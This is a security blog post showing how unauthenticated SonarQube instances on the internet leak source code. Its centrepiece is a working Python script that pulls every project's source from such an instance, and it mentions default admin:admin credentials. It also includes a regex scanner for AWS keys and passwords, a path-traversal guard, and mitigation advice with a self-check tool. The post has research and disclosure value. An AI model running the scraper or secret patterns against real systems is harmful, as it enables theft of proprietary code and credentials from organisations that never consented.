SonarQube projects source code scraper

SonarQube is a platform used for continuous inspection of code quality and code security™.

The irony of the “code security” part comes from the fact that almost 3000 SonarQube interfaces are exposed to the internet, and most of them don’t require authentication. That gives everyone access to the source code of the projects being analyzed for quality and security.

Additionally, some SonarQube versions come with the default admin:admin credentials.

The FBI has also warned that threat actors are abusing misconfigured SonarQube applications to steal source code from US government agencies and businesses.

1. Accessing the source code

Accessing the source code of the existing projects is straightforward: if no authentication is required, we’ll most likely have enough privileges to read the source as well.

In the Projects menu, select the desired project:

Then select the Code menu:

2. Automation

The web interface does not provide the option to download the source code of the projects, but this can be easily achieved using the existing API. Below is a script I wrote to download all the projects existing on a SonarQube instance that does not require authentication:

import os
import sys

import requests

PAGE_SIZE = 500

# Expect the host and port of the SonarQube instance on the command line.
if len(sys.argv) != 3:
    print("Usage: python3 " + sys.argv[0] + " <IP> <port>")
    sys.exit(1)

IP = sys.argv[1]
port = sys.argv[2]
base_url = "http://" + IP + ":" + port


def get_all_components(endpoint, params):
    """Return the components from every page of a paginated API endpoint."""
    components = []
    page = 1
    while True:
        query = dict(params, p=page, ps=PAGE_SIZE)
        response = requests.get(base_url + endpoint, params=query)
        response.raise_for_status()
        data = response.json()
        components.extend(data["components"])
        # Stop on an empty page or once every reported result has been fetched.
        if not data["components"] or page * PAGE_SIZE >= data["paging"]["total"]:
            return components
        page += 1


# List every project, then every file (leaf) inside each project.
source_files = []
for component in get_all_components("/api/components/search_projects", {}):
    print("--------" + component["key"] + "--------")
    leaves = get_all_components(
        "/api/components/tree",
        {"component": component["key"], "strategy": "leaves"},
    )
    for leaf in leaves:
        print(leaf["key"])
        source_files.append(leaf["key"])

# Download the raw source of each file into a folder named after the host.
for key in source_files:
    file_path = os.path.join(IP, key.replace(":", "/"))
    os.makedirs(os.path.dirname(file_path), exist_ok=True)
    response = requests.get(base_url + "/api/sources/raw", params={"key": key})
    if response.ok:
        with open(file_path, "wb") as output:
            output.write(response.content)
    else:
        print("Could not download " + key + " (HTTP " + str(response.status_code) + ")")
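
The download step turns each component key into a local path by replacing ":" with "/". Since those keys come from a remote server we don't control, it may be worth checking that the resulting path stays inside the output folder. Below is a minimal sketch of such a check; the `key_to_local_path` helper and the example key are hypothetical and not part of the script above.

```python
import os


def key_to_local_path(output_dir, key):
    """Map a component key such as 'proj:src/App.java' to a path under output_dir."""
    relative = key.replace(":", "/").lstrip("/")
    root = os.path.abspath(output_dir)
    candidate = os.path.abspath(os.path.join(root, relative))
    # Reject keys that resolve to the output folder itself or to anything outside it.
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise ValueError("unsafe component key: " + key)
    return candidate
```

A key like "proj:src/App.java" maps to a file under the output folder, while a key containing enough "../" segments to escape it raises a ValueError instead of being written to disk.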

To run it, we need to provide the IP address where SonarQube is hosted and the port:

python3 SonarQubeScrapper.py 1.1.1.1 9000

3. Finding sensitive information

As expected, many developers still store sensitive information directly in the source code, which leaves them exposed in scenarios like this one, where the code is leaked. Going through several of these projects, it was possible to find:

  • AWS keys
  • JWT secret keys
  • Email/FTP/SSH passwords
  • Backdoor accounts
  • Vulnerabilities in the code

For some quick hits I tried Hamburglar, but the most interesting information came from manually auditing the code.
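
To give an idea of what a quick automated pass looks like, here is a minimal sketch of a pattern-based scan over a folder of downloaded sources. This is not how Hamburglar works internally; the three patterns and the function names are illustrative assumptions, and a real scanner would use a much larger rule set.

```python
import os
import re

# Illustrative patterns only; they will produce both misses and false positives.
PATTERNS = {
    "AWS access key ID": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private key header": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "hard-coded password": re.compile(
        r"(?i)\bpass(?:word|wd)?\s*[:=]\s*['\"][^'\"]{4,}['\"]"
    ),
}


def scan_text(text):
    """Return (label, line_number, line) for every line matching a pattern."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((label, number, line.strip()))
    return hits


def scan_tree(root):
    """Walk a folder of downloaded sources and yield (path, label, line_number, line)."""
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            with open(path, errors="ignore") as handle:
                for hit in scan_text(handle.read()):
                    yield (path,) + hit
```

Running `scan_tree` on the folder created by the scraper gives a list of candidate lines to review by hand, which is where the manual auditing comes in.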

4. Mitigations

Don’t expose your SonarQube instance to the internet without authentication, or with the default credentials still in place. And of course, improve your coding standards, but I guess that’s what SonarQube is for 🙂
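
If you run SonarQube yourself, a quick way to see where you stand is to call the project listing API without credentials. The sketch below assumes that an instance requiring authentication answers such a request with 401 or 403, and that a 200 means the API can be reached anonymously; whether source code is then readable still depends on each project's permissions. The function names and the example URL are hypothetical.

```python
import urllib.error
import urllib.request


def interpret_status(status_code):
    """Translate the HTTP status of an unauthenticated API call into a verdict."""
    if status_code == 200:
        return "anonymous API access allowed"
    if status_code in (401, 403):
        return "authentication required"
    return "inconclusive (HTTP %d)" % status_code


def check_instance(base_url):
    """Request the project listing endpoint without credentials and report the result."""
    url = base_url.rstrip("/") + "/api/components/search_projects"
    try:
        with urllib.request.urlopen(url, timeout=10) as response:
            status = response.status
    except urllib.error.HTTPError as error:
        # urllib raises on 4xx/5xx responses; the status code is still what we want.
        status = error.code
    return interpret_status(status)
```

For example, `check_instance("http://localhost:9000")` run against your own instance should report that authentication is required.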

